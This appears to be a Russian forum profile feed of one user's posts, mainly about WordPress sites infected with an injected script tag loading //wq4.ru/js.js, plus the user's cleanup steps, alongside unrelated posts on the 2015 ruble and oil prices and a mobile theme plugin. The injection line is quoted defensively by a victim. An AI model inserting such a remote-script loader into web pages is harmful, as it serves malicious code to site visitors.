solomko

solomko
Рейтинг
213
Регистрация
01.09.2007
Интересы
Всякие
Я человек добрый.....
eiweb:
Проверьте свой сайт с помощью "wpscan" возможно много интересного про свой сайт узнаете.
Например Ваш логин от админ панели, а вот сбрутить пароль если получится, тогда уже в сторону хостера головой кивать.

Спасибо, беда в том, что у меня их пачка... Где прорыв не ясно.

SeVlad:
Похоже на тему/плагин с помойки/устаревшую/уязвимую.

Может быть, просто, в сети уйма других сайтов, у которых этот код появился начиная с 16 мая... Поэтому я и думаю, что это новая атака на ВП. А вот возраст и причины уязвимости мне неизвестны.

Вдруг кому-то пригодится как бороться\убрать код "<script type="text/javascript" src="//wq4.ru/js.js"></script>"

Внимание! В БД он отображается как: "<script type="text/javascript" src="//wq4.ru/js.js"></script>"

Я не особо большой специалист, но установил, что вирус этот пишется в базы данных. На хостере было пару моих БД, все разные и с разными именами\паролями. Видимо где-то хостер подкачал, что стали известны пароли или я какой-то плагин не обновил.

Вирус имел название PHP:BackDoor-BX [Trj]

Что я сделал:

1) скачал БД, нашел в них код этого вируса (увы, но только код который "вставляется").

2) Параллельно нашелся файл в котором был этот вирус - это был options.php файлик в кешпапке... Хостер вирус не обнаружил, файл был обнаружен ативирусом на компьютере.

3) После замены\удаления кода в БД, я сменил пароли ко всем БД и их имена.

4) Залил очищенные базы данных.

Может, кому-то эта информация поможет.

Привет всем.

На большинстве моих сайтов с движком ВП, примерно 90%, появился вот этот вот скрипт

<script type="text/javascript" src="//wq4.ru/js.js"></script>
.... В записях, рандомно (не во всех).

Погуглил в сети, на многих сайтах он так же появился недавно, особенно часто он "впихивается" как текст в формы для кода.... Похоже, что это новая атака на движок ВП.

Как побороть эту гадость, никто не сталкивался? Откуда оно грузится?

Я так понимаю, до конца июня рубль будет стабилен (в конце июня, будут думать о снятии санкций с Ирана, до тех пор нефть будет +\- чуток)? Или ЦБРФ еще раз хочет закупить?

Европейский союз готовится в ближайшие недели продлить срок действия введенных в отношении России санкций до конца января 2016 года, рассказали европейские дипломаты.

The Wall Street Journal

---------- Добавлено 03.06.2015 в 21:13 ----------

Ратник:
И какова связь? Китайцы будут нефтеналивные танкеры топить?

Логистика

10 букв

edogs:
Что-то уж как-то резво поперло вверх.

И не останавливается......

6го числа заседает ОПЕК, может что-то решат с нефтью (мало вероятно).

7-8 будет Г7 заседать, но тут не понятно, что они решат. Санкции то сохранят, это уже ясно, но будут ли увеличивать их...

А еще нависает тень акционеров ЮКОСа, в июле будут первые заседания в Германии и Великобритании...

edogs:
Какая-то причина есть для столь резкого падения?

Говорят, там Китайцы где-то мутят с островами, а рядом проходят мореходные-пути у нефте-танкеров. Так что, может, нефть подорожает. Если Китай не успокоится.

Вот и причина.

Понимаю, что упал сервер авторизации, жаль.

Но вопрос по выплатам. Заказал в понедельник, пока тишина. У всех так? Раньше в обед заказал - вечером получил...

SeVlad:
если тема не адаптивная и стоит задача именно сменить тему, то есть масса плагинов для решения такой задачи.

Основная тема не адаптивна, но есть дополнительная, которая полностью адаптированна под мобильные девайсы, вот на неё то и нужно чтобы переключалось.

Спасибо, посмотрю среди плагинов "переключалку".

упд. Беда большинства плагинов, что они не поддерживают другие плагины (особенно плагин кеша)...

Можно как-то это "обойти"? Без плагинов, может какая-то функция есть?

Добрый день.

А как в ВП "указать"\"сделать" переключение на мобильную тему, в случае если заход с мобильного устройства?

Можете посоветовать какой-то плагин, который переключает тему?

Всего: 2405